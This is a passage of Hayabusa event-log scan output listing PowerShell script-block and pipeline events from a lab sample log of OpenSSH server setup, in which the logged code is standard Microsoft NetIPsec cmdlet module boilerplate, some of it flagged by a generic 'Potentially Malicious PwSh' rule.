$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.833 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.834 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.834 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.834 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.859 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject 
(cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.859 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( 
$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 
'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.860 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.860 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.860 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.861 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule 